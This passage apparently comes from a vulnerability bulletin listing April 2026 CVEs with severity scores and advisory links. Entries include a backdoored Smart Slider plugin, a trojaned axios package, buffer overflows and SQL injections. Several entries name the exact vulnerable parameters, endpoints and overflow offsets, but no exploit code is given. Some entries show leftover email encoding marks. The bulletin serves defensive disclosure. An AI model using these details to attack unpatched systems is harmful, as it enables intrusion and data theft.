      Source Info: CVE-2026-34179 [ https://www.cve.org/CVERecord?id=CVE-2026-34179 ]
      Patch Info:
        Update of type field in restricted TLS certificate allows privilege escalation to cluster admin [ https://github.com/canonical/lxd/security/advisories/GHSA-c3h3-89qf-jqm5 ]
        Improve validation on certificate edit [ https://github.com/canonical/lxd/pull/17936 ]

    Nextendweb--Smart Slider 3 Pro for WordPress
      Description: Smart Slider 3 Pro version 3.5.1.35 for WordPress and Joomla contains a multi-stage remote access toolkit injected through a compromised update system that allows unauthenticated attackers to execute arbitrary code and commands. Attackers can trigger pre-authentication remote shell execution via HTTP headers, establish authenticated backdoors accepting arbitrary PHP code or OS commands, create hidden administrator accounts, exfiltrate credentials and access keys, and maintain persistence through multiple injection points including must-use plugins and core file modifications.
      Published: 2026-04-09
      CVSS Score: 9.8
      Source Info: CVE-2026-34424 [ https://www.cve.org/CVERecord?id=CVE-2026-34424 ]
      Patch Info:
        https://smartslider.helpscoutdocs.com/article/2144-wordpress-security-advisory-smart-slider-3-pro-3-5-1-35-compromise
        https://smartslider.helpscoutdocs.com/article/2143-joomla-security-advisory-smart-slider-3-pro-3-5-1-35-compromise
        https://patchstack.com/database/wordpress/plugin/nextend-smart-slider3-pro/vulnerability/wordpress-smart-slider-3-plugin-3-5-1-35-backdoor-vulnerability
        https://patchstack.com/articles/critical-supply-chain-compromise-in-smart-slider-3-pro-full-malware-analysis/
        https://mysites.guru/blog/smart-slider-3-pro-supply-chain-compromise/
    usebruno--bruno
      Description: Bruno is an open source IDE for exploring and testing APIs. Prior to 3.2.1, Bruno was affected by a supply chain attack involving compromised versions of the axios npm package, which introduced a hidden dependency deploying a cross-platform Remote Access Trojan (RAT). Users of @usebruno/cli who ran npm install between 00:21 UTC and ~03:30 UTC on March 31, 2026 may have been impacted. Upgrade to 3.2.1.
      Published: 2026-04-06
      CVSS Score: 9.8
      Source Info: CVE-2026-34841 [ https://www.cve.org/CVERecord?id=CVE-2026-34841 ]
      Patch Info:
        https://github.com/usebruno/bruno/security/advisories/GHSA-658g-p7jg-wx5g
        https://github.com/axios/axios/issues/10604
        https://github.com/usebruno/bruno/pull/7632
        https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat

    R-Project--RGui
      Description: RGui 3.5.0 contains a local buffer overflow vulnerability in the GUI preferences dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can craft malicious input in the Language for menus and messages field to trigger a stack-based buffer overflow, execute a ROP chain for VirtualAlloc allocation, and achieve arbitrary code execution.
      Published: 2026-04-12
      CVSS Score: 8.4
      Source Info: CVE-2018-25258 [ https://www.cve.org/CVERecord?id=CVE-2018-25258 ]
      Patch Info:
        ExploitDB-46107 [ https://www.exploit-db.com/exploits/46107 ]
        Official Product Homepage [ https://www.r-project.org/ ]
        Product Reference [ https://cran.r-project.org/bin/windows/base/old/3.5.0/R-3.5.0-win.exe ]
        VulnCheck Advisory: RGui 3.5.0 Local Buffer Overflow SEH DEP Bypass [ https://www.vulncheck.com/advisories/rgui-local-buffer-overflow-seh-dep-bypass ]

    Html5Videoplayer--HTML5 Video Player
      Description: HTML5 Video Player 1.2.5 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by supplying an oversized key code string. Attackers can craft a malicious payload exceeding 997 bytes and paste it into the KEY CODE field in the Help Register dialog to trigger code execution and spawn a calculator process.
      Published: 2026-04-12
      CVSS Score: 8.4
      Source Info: CVE-2019-25689 [ https://www.cve.org/CVERecord?id=CVE-2019-25689 ]
      Patch Info:
        ExploitDB-46279 [ https://www.exploit-db.com/exploits/46279 ]
        Official Product Homepage [ http://www.html5videoplayer.net/download.html ]
        VulnCheck Advisory: HTML5 Video Player 1.2.5 Local Buffer Overflow Non-SEH [ https://www.vulncheck.com/advisories/html5-video-player-local-buffer-overflow-non-seh ]

    Faleemi--Faleemi Desktop Software
      Description: Faleemi Desktop Software 1.8 contains a local buffer overflow vulnerability in the System Setup dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can inject a crafted payload into the Save Path for Snapshot and Record file field to trigger a buffer overflow and execute arbitrary code via ROP chain gadgets.
      Published: 2026-04-12
      CVSS Score: 8.4
      Source Info: CVE-2019-25691 [ https://www.cve.org/CVERecord?id=CVE-2019-25691 ]
      Patch Info:
        ExploitDB-46269 [ https://www.exploit-db.com/exploits/46269 ]
        Official Product Homepage [ https://www.faleemi.com/ ]
        VulnCheck Advisory: Faleemi Desktop Software 1.8 Local Buffer Overflow SEH DEP Bypass [ https://www.vulncheck.com/advisories/faleemi-desktop-software-local-buffer-overflow-seh-dep-bypass ]

    r-project--R
      Description: R 3.4.4 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by injecting malicious input into the GUI Preferences language field. Attackers can craft a payload with a 292-byte offset and JMP ESP instruction to execute commands like calc.exe when the payload is pasted into the Language for menus and messages field.
      Published: 2026-04-12
      CVSS Score: 8.4
      Source Info: CVE-2019-25695 [ https://www.cve.org/CVERecord?id=CVE-2019-25695 ]
      Patch Info:
        ExploitDB-46265 [ https://www.exploit-db.com/exploits/46265 ]
        Official Product Homepage [ https://cloud.r-project.org/bin/windows/ ]
        VulnCheck Advisory: R 3.4.4 Local Buffer Overflow Windows XP SP3 [ https://www.vulncheck.com/advisories/r-local-buffer-overflow-windows-xp-sp3 ]

    VictorAlagwu--CMSsite
      Description: CMSsite 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the cat_id parameter. Attackers can send GET requests to category.php with malicious cat_id values to extract sensitive database information including usernames and credentials.
      Published: 2026-04-12
      CVSS Score: 8.2
      Source Info: CVE-2019-25697 [ https://www.cve.org/CVERecord?id=CVE-2019-25697 ]
      Patch Info:
        ExploitDB-46259 [ https://www.exploit-db.com/exploits/46259 ]
        Product Reference [ https://github.com/VictorAlagwu/CMSsite/archive/master.zip ]
        VulnCheck Advisory: CMSsite 1.0 SQL Injection via category.php [ https://www.vulncheck.com/advisories/cmssite-sql-injection-via-category-php ]

    Divxtodvd--Easy Video to iPod Converter
      Description: Easy Video to iPod Converter 1.6.20 contains a local buffer overflow vulnerability in the user registration field that allows local attackers to overwrite the structured exception handler. Attackers can input a crafted payload exceeding 996 bytes in the username field to trigger SEH overwrite and execute arbitrary code with user privileges.
      Published: 2026-04-12
      CVSS Score: 8.4
      Source Info: CVE-2019-25701 [ https://www.cve.org/CVERecord?id=CVE-2019-25701 ]
      Patch Info:
        ExploitDB-46255 [ https://www.exploit-db.com/exploits/46255 ]
        Official Product Homepage [ http://www.divxtodvd.net/ ]
        Product Reference [ http://www.divxtodvd.net/easy_video_to_ipod.exe ]
        VulnCheck Advisory: Easy Video to iPod Converter 1.6.20 Local Buffer Overflow SEH [ https://www.vulncheck.com/advisories/easy-video-to-ipod-converter-local-buffer-overflow-seh ]

    Sourceforge--Echo Mirage
      Description: Echo Mirage 3.1 contains a stack buffer overflow vulnerability that allows local attackers to crash the application or execute arbitrary code by supplying an oversized string in the Rules action field. Attackers can create a malicious text file with a crafted payload exceeding buffer boundaries and paste it into the action field through the Rules dialog to trigger the overflow and overwrite the return address.
      Published: 2026-04-12
      CVSS Score: 8.4
      Source Info: CVE-2019-25705 [ https://www.cve.org/CVERecord?id=CVE-2019-25705 ]
      Patch Info:
        ExploitDB-46216 [ https://www.exploit-db.com/exploits/46216 ]
        Official Product Homepage [ http://initd.sh/ ]
        Product Reference [ https://sourceforge.net/projects/echomirage.oldbutgold.p/ ]
        VulnCheck Advisory: Echo Mirage 3.1 Stack Buffer Overflow via Rules Action Field [ https://www.vulncheck.com/advisories/echo-mirage-stack-buffer-overflow-via-rules-action-field ]
    =C2=A0 Dolibarr--Dolibarr ERP-CRM Dolibarr ERP-CRM 8.0.4 contains an SQL in= jection vulnerability in the rowid parameter of the admin dict.php endpoint=
    that allows attackers to execute arbitrary SQL queries. Attackers can inje=
    ct malicious SQL code through the rowid POST parameter to extract sensitive=
    database information using error-based SQL injection techniques. 2026-04-1=
    2 8.2 CVE-2019-25710 [ https://www.cve.org/CVERecord?id=3DCVE-2019-25710 ] = ExploitDB-46095 [ https://www.exploit-db.com/exploits/46095 ]
    Official Product Homepage [ https://www.dolibarr.org/ ]
    Product Reference [ https://sourceforge.net/projects/dolibarr/files/Dolibar= r%20ERP-CRM/8.0.4/dolibarr-8.0.4.zip ]
    VulnCheck Advisory: Dolibarr ERP-CRM 8.0.4 SQL Injection via rowid Paramete=
    r [ https://www.vulncheck.com/advisories/dolibarr-erp-crm-sql-injection-via= -rowid-parameter ]
    =C2=A0 Synology--Synology SSL VPN Client A plaintext storage of a password = vulnerability in Synology SSL VPN Client before 1.4.5-0684 allows remote at= tackers to access or influence the user's PIN code due to insecure storage.=
    This may lead to unauthorized VPN configuration and potential interception=
    of subsequent VPN traffic when combined with user interaction. 2026-04-10 = 8.1 CVE-2021-47961 [ https://www.cve.org/CVERecord?id=3DCVE-2021-47961 ] Sy= nology-SA-26:05 Synology SSL VPN Client [ https://www.synology.com/en-globa= l/security/advisory/Synology_SA_26_05 ]
    =C2=A0 Adivaha--WordPress adivaha Travel Plugin WordPress adivaha Travel Pl= ugin 2.3 contains a time-based blind SQL injection vulnerability that allow=
    s unauthenticated attackers to manipulate database queries by injecting SQL=
    code through the 'pid' GET parameter. Attackers can send requests to the /= mobile-app/v3/ endpoint with crafted 'pid' values using XOR-based payloads =
    to extract sensitive database information or cause denial of service. 2026-= 04-09 8.2 CVE-2023-54359 [ https://www.cve.org/CVERecord?id=3DCVE-2023-5435=
    9 ] ExploitDB-51655 [ https://www.exploit-db.com/exploits/51655 ]
    Official Product Homepage [ https://www.adivaha.com/ ]
    Product Reference [ https://wordpress.org/plugins/adiaha-hotel/ ]
    VulnCheck Advisory: WordPress adivaha Travel Plugin 2.3 SQL Injection via p=
    id [ https://www.vulncheck.com/advisories/wordpress-adivaha-travel-plugin-s= ql-injection-via-pid ]
    =C2=A0 Juniper Networks--Apstra A Key Exchange without Entity Authenticatio=
    n vulnerability in the SSH implementation of Juniper Networks Apstra allows=
    a unauthenticated, MITM attacker to impersonate managed devices. Due to in= sufficient SSH host key validation an attacker can perform a machine-in-the= -middle attack on the SSH connections from Apstra to managed devices, enabl= ing an attacker to impersonate a managed device and capture user credential=
    s. This issue affects all versions of=C2=A0Apstra before 6.1.1. 2026-04-09 = 8.7 CVE-2025-13914 [ https://www.cve.org/CVERecord?id=3DCVE-2025-13914 ] ht= tps://kb.juniper.net/JSA107862
    =C2=A0 Qualcomm, Inc.--Snapdragon Memory corruption when decoding corrupted=
    satellite data files with invalid signature offsets. 2026-04-06 8.8 CVE-20= 25-47392 [ https://www.cve.org/CVERecord?id=3DCVE-2025-47392 ] https://docs= .qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.= html
    =C2=A0 CactusThemes--VideoPro Improper Control of Filename for Include/Requ= ire Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in=
    CactusThemes VideoPro allows PHP Local File Inclusion.This issue affects V= ideoPro: from n/a through 2.3.8.1. 2026-04-10 8.1 CVE-2025-58913 [ https://= www.cve.org/CVERecord?id=3DCVE-2025-58913 ] https://patchstack.com/database= /wordpress/theme/videopro/vulnerability/wordpress-videopro-theme-2-3-8-1-lo= cal-file-inclusion-vulnerability?_s_id=3Dcve
Hitachi--JP1/IT Desktop Management 2 - Manager | Remote Code Execution Vulnerability in JP1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management 2 - Operations Director on Windows, Job Management Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management - Manager on Windows, Job Management Partner 1/IT Desktop Management - Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client on Windows, Job Management Partner 1/Software Distribution Manager on Windows, Job Management Partner 1/Software Distribution Client on Windows. This issue affects JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2 - Operations Director: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job Management Partner 1/IT Desktop Management 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop Management - Manager: from 09-50 through 10-10-16; Job Management Partner 1/IT Desktop Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 through 10-20-02; Job Management Partner 1/Software Distribution Manager: from 09-00 through 09-51-13; Job Management Partner 1/Software Distribution Client: from 09-00 through 09-51-13. | 2026-04-07 | 8.8 | CVE-2025-65115 [ https://www.cve.org/CVERecord?id=CVE-2025-65115 ] https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2026-118/index.html

IBM--Verify Identity Access Container | IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 could allow a locally authenticated user to execute malicious scripts from outside of its control sphere. | 2026-04-07 | 8.5 | CVE-2026-1342 [ https://www.cve.org/CVERecord?id=CVE-2026-1342 ] https://www.ibm.com/support/pages/node/7268253

LibRaw--LibRaw | An integer overflow vulnerability exists in the deflate_dng_load_raw functionality of LibRaw Commit 8dc68e2. A specially crafted malicious file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability. | 2026-04-07 | 8.1 | CVE-2026-20884 [ https://www.cve.org/CVERecord?id=CVE-2026-20884 ] https://talosintelligence.com/vulnerability_reports/TALOS-2026-2364

Windmill Labs--Windmill CE (Community Edition) | Windmill versions 1.56.0 through 1.614.0 contain a missing authorization vulnerability that allows users with the Operator role to perform prohibited entity creation and modification actions via the backend API. Although Operators are documented and priced as unable to create or modify entities, the API does not enforce the Operator restriction on workspace endpoints, allowing an Operator to create and update scripts, flows, apps, and raw_apps. Since Operators can also execute scripts via the jobs API, this allows direct privilege escalation to remote code execution within the Windmill deployment. This vulnerability has existed since the introduction of the Operator role in version 1.56.0. | 2026-04-07 | 8.8 | CVE-2026-22683 [ https://www.cve.org/CVERecord?id=CVE-2026-22683 ] https://chocapikk.com/posts/2026/windfall-nextcloud-flow-windmill-rce/
https://github.com/Chocapikk/Windfall
https://github.com/windmill-labs/windmill/releases/tag/v1.615.0
https://github.com/windmill-labs/windmill/commit/c621a74804f4f6e8318819c01e3a23a17698588b
https://www.windmill.dev/
https://apps.nextcloud.com/apps/flow/releases

chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38, there is a path traversal in main/exercise/savescores.php leading to arbitrary file deletion. User input from $_REQUEST['test'] is concatenated directly into a filesystem path without canonicalization or traversal checks. This vulnerability is fixed in 1.11.38. | 2026-04-10 | 8.3 | CVE-2026-31939 [ https://www.cve.org/CVERecord?id=CVE-2026-31939 ] https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-8q8c-v75x-q2hx
https://github.com/chamilo/chamilo-lms/commit/4dddcc19d36119da27b7c49eb84a035800abae78
https://github.com/chamilo/chamilo-lms/releases/tag/v1.11.38

danbilabs--Advanced Members for ACF | The Advanced Members for ACF plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the create_crop function in all versions up to, and including, 1.2.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). The vulnerability was partially patched in version 1.2.5. | 2026-04-08 | 8.8 | CVE-2026-3243 [ https://www.cve.org/CVERecord?id=CVE-2026-3243 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/22b63369-c6ea-42e9-bea3-d15837da7732?source=cve
https://plugins.trac.wordpress.org/browser/advanced-members/tags/1.2.4/core/modules/class-avatar.php#L57
https://plugins.trac.wordpress.org/browser/advanced-members/tags/1.2.4/core/modules/class-avatar.php#L266
https://plugins.trac.wordpress.org/browser/advanced-members/trunk/core/modules/class-avatar.php#L710
https://plugins.trac.wordpress.org/changeset/3479725/
https://plugins.trac.wordpress.org/changeset/3492372/

Elastic--Logstash | Improper Limitation of a Pathname to a Restricted Directory (CWE-22) in Logstash can lead to arbitrary file write and potentially remote code execution via Relative Path Traversal (CAPEC-139). The archive extraction utilities used by Logstash do not properly validate file paths within compressed archives. An attacker who can serve a specially crafted archive to Logstash through a compromised or attacker-controlled update endpoint can write arbitrary files to the host filesystem with the privileges of the Logstash process. In certain configurations where automatic pipeline reloading is enabled, this can be escalated to remote code execution. | 2026-04-08 | 8.1 | CVE-2026-33466 [ https://www.cve.org/CVERecord?id=CVE-2026-33466 ] https://discuss.elastic.co/t/logstash-8-19-14-9-2-8-9-3-3-security-update-esa-2026-29/385816

homarr-labs--homarr | Homarr is an open-source dashboard. Prior to 1.57.0, a DOM-based Cross-Site Scripting (XSS) vulnerability has been discovered in Homarr's /auth/login page. The application improperly trusts a URL parameter (callbackUrl), which is passed to redirect and router.push. An attacker can craft a malicious link that, when opened by an authenticated user, performs a client-side redirect and executes arbitrary JavaScript in the context of their browser. This could lead to credential theft, internal network pivoting, and unauthorized actions performed on behalf of the victim. This vulnerability is fixed in 1.57.0. | 2026-04-06 | 8.8 | CVE-2026-33510 [ https://www.cve.org/CVERecord?id=CVE-2026-33510 ] https://github.com/homarr-labs/homarr/security/advisories/GHSA-79pg-554g-rw82

IBM--Langflow Desktop | IBM Langflow Desktop 1.6.0 through 1.8.2 Langflow could allow an authenticated user to execute arbitrary code on the system, caused by an insecure default setting which permits the deserialization of untrusted data in the FAISS component. | 2026-04-08 | 8.8 | CVE-2026-3357 [ https://www.cve.org/CVERecord?id=CVE-2026-3357 ] https://www.ibm.com/support/pages/node/7268428

chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, the PlatformConfigurationController::decodeSettingArray() method uses PHP's eval() to parse platform settings from the database. An attacker with admin access (obtainable via Advisory 1) can inject arbitrary PHP code into the settings, which is then executed when any user (including unauthenticated) requests /platform-config/list. This vulnerability is fixed in 2.0.0-RC.3. | 2026-04-10 | 8.8 | CVE-2026-33618 [ https://www.cve.org/CVERecord?id=CVE-2026-33618 ] https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-hp4w-jmwc-pg7w
https://github.com/chamilo/chamilo-lms/commit/f2c382c94a3f153a4d7e5ce5686c5a219fd09b3b

lexiforest--curl_cffi | curl_cffi is a Python binding for curl. Prior to 0.15.0, curl_cffi does not restrict requests to internal IP ranges, and follows redirects automatically via the underlying libcurl. Because of this, an attacker-controlled URL can redirect requests to internal services such as cloud metadata endpoints. In addition, curl_cffi's TLS impersonation feature can make these requests appear as legitimate browser traffic, which may bypass certain network controls. This vulnerability is fixed in 0.15.0. | 2026-04-06 | 8.6 | CVE-2026-33752 [ https://www.cve.org/CVERecord?id=CVE-2026-33752 ] https://github.com/lexiforest/curl_cffi/security/advisories/GHSA-qw2m-4pqf-rmpp

Juniper Networks--Junos OS | A Missing Authorization vulnerability in the CLI of Juniper Networks Junos OS on MX Series allows a local, authenticated user with low privileges to execute specific commands which will lead to a complete compromise of managed devices. Any user logged in, without requiring specific privileges, can issue 'request csds' CLI operational commands. These commands are only meant to be executed by high-privileged users or users designated for Juniper Device Manager (JDM) / Connected Security Distributed Services (CSDS) operations, as they will impact all aspects of the devices managed via the respective MX. This issue affects Junos OS on MX Series: * 24.4 releases before 24.4R2-S3, * 25.2 releases before 25.2R2. This issue does not affect Junos OS releases before 24.4. | 2026-04-09 | 8.8 | CVE-2026-33785 [ https://www.cve.org/CVERecord?id=CVE-2026-33785 ] https://kb.juniper.net/JSA107872

podman-desktop--podman-desktop | Podman Desktop is a graphical tool for developing on containers and Kubernetes. Prior to 1.26.2, an unauthenticated HTTP server exposed by Podman Desktop allows any network attacker to remotely trigger denial-of-service conditions and extract sensitive information. By abusing missing connection limits and timeouts, an attacker can exhaust file descriptors and kernel memory, leading to application crash or full host freeze. Additionally, verbose error responses disclose internal paths and system details (including usernames on Windows), aiding further exploitation. The issue requires no authentication or user interaction and is exploitable over the network. This vulnerability is fixed in 1.26.2. | 2026-04-07 | 8.2 | CVE-2026-34045 [ https://www.cve.org/CVERecord?id=CVE-2026-34045 ] https://github.com/podman-desktop/podman-desktop/security/advisories/GHSA-2q88-39rh-gxvv

OpenClaw--OpenClaw | OpenClaw before 2026.3.25 contains an improper access control vulnerability in the HTTP /sessions/:sessionKey/kill route that allows any bearer-authenticated user to invoke admin-level session termination functions without proper scope validation. Attackers can exploit this by sending authenticated requests to kill arbitrary subagent sessions via the killSubagentRunAdmin function, bypassing ownership and operator scope restrictions. | 2026-04-09 | 8.1 | CVE-2026-34512 [ https://www.cve.org/CVERecord?id=CVE-2026-34512 ] GitHub Security Advisory (GHSA-9p93-7j67-5pc2) [ https://github.com/openclaw/openclaw/security/advisories/GHSA-9p93-7j67-5pc2 ]
Patch Commit [ https://github.com/openclaw/openclaw/commit/02cf12371f9353a16455da01cc02e6c4ecfc4152 ]
VulnCheck Advisory: OpenClaw < 2026.3.25 - Improper Access Control in /sessions/:sessionKey/kill Endpoint [ https://www.vulncheck.com/advisories/openclaw-improper-access-control-in-sessions-sessionkey-kill-endpoint ]

opnsense--core | OPNsense is a FreeBSD based firewall and routing platform. Prior to 26.1.6, OPNsense's LDAP authentication connector passes the login username directly into an LDAP search filter without calling ldap_escape(). An unauthenticated attacker can inject LDAP filter metacharacters into the username field of the WebGUI login page to enumerate valid LDAP usernames in the configured directory. When the LDAP server configuration includes an Extended Query to restrict login to members of a specific group, the same injection can be used to bypass that group membership restriction and authenticate as any LDAP user whose password is known, regardless of group membership. This vulnerability is fixed in 26.1.6. | 2026-04-09 | 8.2 | CVE-2026-34578 [ https://www.cve.org/CVERecord?id=CVE-2026-34578 ] https://github.com/opnsense/core/security/advisories/GHSA-jpm7-f59c-mp54
https://github.com/opnsense/core/commit/016f66cb4620cd48183fa97843f343bb71813c6e

Adobe--Acrobat Reader | Acrobat Reader versions 24.001.30356, 26.001.21367 and earlier are affected by an Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. | 2026-04-11 | 8.6 | CVE-2026-34621 [ https://www.cve.org/CVERecord?id=CVE-2026-34621 ] https://helpx.adobe.com/security/products/acrobat/apsb26-43.html

MontFerret--ferret | Ferret is a declarative system for working with web data. Prior to 2.0.0-alpha.4, a path traversal vulnerability in Ferret's IO::FS::WRITE standard library function allows a malicious website to write arbitrary files to the filesystem of the machine running Ferret. When an operator scrapes a website that returns filenames containing ../ sequences, and uses those filenames to construct output paths (a standard scraping pattern), the attacker controls both the destination path and the file content. This can lead to remote code execution via cron jobs, SSH authorized_keys, shell profiles, or web shells. This vulnerability is fixed in 2.0.0-alpha.4. | 2026-04-06 | 8.1 | CVE-2026-34783 [ https://www.cve.org/CVERecord?id=CVE-2026-34783 ] https://github.com/MontFerret/ferret/security/advisories/GHSA-j6v5-g24h-vg4j
https://github.com/MontFerret/ferret/commit/160ebad6bd50f153453e120f6d909f5b83322917

David Lingren--Media Library Assistant | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David Lingren Media Library Assistant allows SQL Injection. This issue affects Media Library Assistant: from n/a through 3.34. | 2026-04-06 | 8.5 | CVE-2026-34885 [ https://www.cve.org/CVERecord?id=CVE-2026-34885 ] https://patchstack.com/database/wordpress/plugin/media-library-assistant/vulnerability/wordpress-media-library-assistant-plugin-3-34-sql-injection-vulnerability?_s_id=cve

adianti--Adianti Framework | Adianti Framework 5.5.0 and 5.6.0 contain an SQL injection vulnerability that allows authenticated users to manipulate database queries by injecting SQL code through the name field in SystemProfileForm. Attackers can submit crafted SQL statements in the profile edit endpoint to modify user credentials and gain administrative access. | 2026-04-12 | 7.1 | CVE-2018-25257 [ https://www.cve.org/CVERecord?id=CVE-2018-25257 ] ExploitDB-46217 [ https://www.exploit-db.com/exploits/46217 ]
VulnCheck Advisory: Adianti Framework 5.5.0 and 5.6.0 SQL Injection via Profile [ https://www.vulncheck.com/advisories/adianti-framework-and-sql-injection-via-profile ]

Resourcespace--ResourceSpace | ResourceSpace 8.6 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the keywords parameter in collection_edit.php. Attackers can submit POST requests with crafted SQL payloads in the keywords field to extract sensitive database information including schema names, user credentials, and other confidential data. | 2026-04-12 | 7.1 | CVE-2019-25693 [ https://www.cve.org/CVERecord?id=CVE-2019-25693 ] ExploitDB-46274 [ https://www.exploit-db.com/exploits/46274 ]
Official Product Homepage [ https://www.resourcespace.com/ ]
Product Reference [ https://www.resourcespace.com/get ]
VulnCheck Advisory: ResourceSpace 8.6 SQL Injection via collection_edit.php [ https://www.vulncheck.com/advisories/resourcespace-sql-injection-via-collection-edit-php ]

Newsbull--Newsbull Haber Script | Newsbull Haber Script 1.0.0 contains multiple SQL injection vulnerabilities in the search parameter that allow authenticated attackers to extract database information through time-based, blind, and boolean-based injection techniques. Attackers can inject malicious SQL code through the search parameter in endpoints like /admin/comment/records, /admin/category/records, /admin/news/records, and /admin/menu/childs to manipulate database queries and retrieve sensitive data. | 2026-04-12 | 7.1 | CVE-2019-25699 [ https://www.cve.org/CVERecord?id=CVE-2019-25699 ] ExploitDB-46266 [ https://www.exploit-db.com/exploits/46266 ]
Official Product Homepage [ http://newsbull.org/ ]
Product Reference [ https://github.com/gurkanuzunca/newsbull ]
VulnCheck Advisory: Newsbull Haber Script 1.0.0 Authenticated SQL Injection via search parameter [ https://www.vulncheck.com/advisories/newsbull-haber-script-authenticated-sql-injection-via-search-parameter ]

Impresscms--ImpressCMS | ImpressCMS 1.3.11 contains a time-based blind SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the 'bid' parameter. Attackers can send POST requests to the admin.php endpoint with malicious 'bid' values containing SQL commands to extract sensitive database information. | 2026-04-12 | 7.1 | CVE-2019-25703 [ https://www.cve.org/CVERecord?id=CVE-2019-25703 ] ExploitDB-46239 [ https://www.exploit-db.com/exploits/46239 ]
Official Product Homepage [ http://www.impresscms.org/ ]
Product Reference [ https://sourceforge.net/projects/impresscms/files/v1.3.11/impresscms_1.3.11.zip ]
VulnCheck Advisory: ImpressCMS 1.3.11 SQL Injection via bid Parameter [ https://www.vulncheck.com/advisories/impresscms-sql-injection-via-bid-parameter ]

Across--DR-810 | Across DR-810 contains an unauthenticated file disclosure vulnerability that allows remote attackers to download the rom-0 backup file containing sensitive information by sending a simple GET request. Attackers can access the rom-0 endpoint without authentication to retrieve and decompress the backup file, exposing router passwords and other sensitive configuration data. | 2026-04-12 | 7.5 | CVE-2019-25706 [ https://www.cve.org/CVERecord?id=CVE-2019-25706 ] ExploitDB-46132 [ https://www.exploit-db.com/exploits/46132 ]
Official Product Homepage [ http://www.ac.i8i.ir/ ]
VulnCheck Advisory: Across DR-810 ROM-0 Unauthenticated File Disclosure [ https://www.vulncheck.com/advisories/across-dr-810-rom-0-unauthenticated-file-disclosure ]

Ebrigade--eBrigade ERP | eBrigade ERP 4.5 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'id' parameter. Attackers can send GET requests to pdf.php with crafted SQL payloads in the 'id' parameter to extract sensitive database information including table names and schema details. | 2026-04-12 | 7.1 | CVE-2019-25707 [ https://www.cve.org/CVERecord?id=CVE-2019-25707 ] ExploitDB-46117 [ https://www.exploit-db.com/exploits/46117 ]
Official Product Homepage [ https://ebrigade.net/ ]
Product Reference [ https://netcologne.dl.sourceforge.net/project/ebrigade/ebrigade/eBrigade%204.5/ebrigade_4.5.zip ]
VulnCheck Advisory: eBrigade ERP 4.5 SQL Injection via pdf.php [ https://www.vulncheck.com/advisories/ebrigade-erp-sql-injection-via-pdf-php ]

MyT--Project Management | MyT-PM 1.5.1 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the Charge[group_total] parameter. Attackers can submit crafted POST requests to the /charge/admin endpoint with error-based, time-based blind, or stacked query payloads to extract sensitive database information or manipulate data. | 2026-04-12 | 7.1 | CVE-2019-25713 [ https://www.cve.org/CVERecord?id=CVE-2019-25713 ] ExploitDB-46084 [ https://www.exploit-db.com/exploits/46084 ]
Official Product Homepage [ https://manageyourteam.net/ ]
Product Reference [ https://sourceforge.net/projects/myt/ ]
VulnCheck Advisory: MyT-PM 1.5.1 SQL Injection via Charge[group_total] Parameter [ https://www.vulncheck.com/advisories/myt-pm-sql-injection-via-charge-group-total-parameter ]

Twitch--Twitch Studio | Twitch Studio version 0.114.8 and prior contain a privilege escalation vulnerability in its privileged helper tool that allows local attackers to execute arbitrary code as root by exploiting an unprotected XPC service. Attackers can invoke the installFromPath:toPath:withReply: method to overwrite system files and privileged binaries, achieving full system compromise. Twitch Studio was discontinued in May 2024. | 2026-04-06 | 7.8 | CVE-2024-14032 [ https://www.cve.org/CVERecord?id=CVE-2024-14032 ] https://www.iru.com/blog/twitch-privileged-helper
https://help.twitch.tv/s/topic/0TO3a000000kZfYGAU/twitch-studio
https://help.twitch.tv/s/article/recommended-software-for-broadcasting
https://www.vulncheck.com/advisories/twitch-studio-launcherhelper-xpc-missing-authorization-to-root-file-write

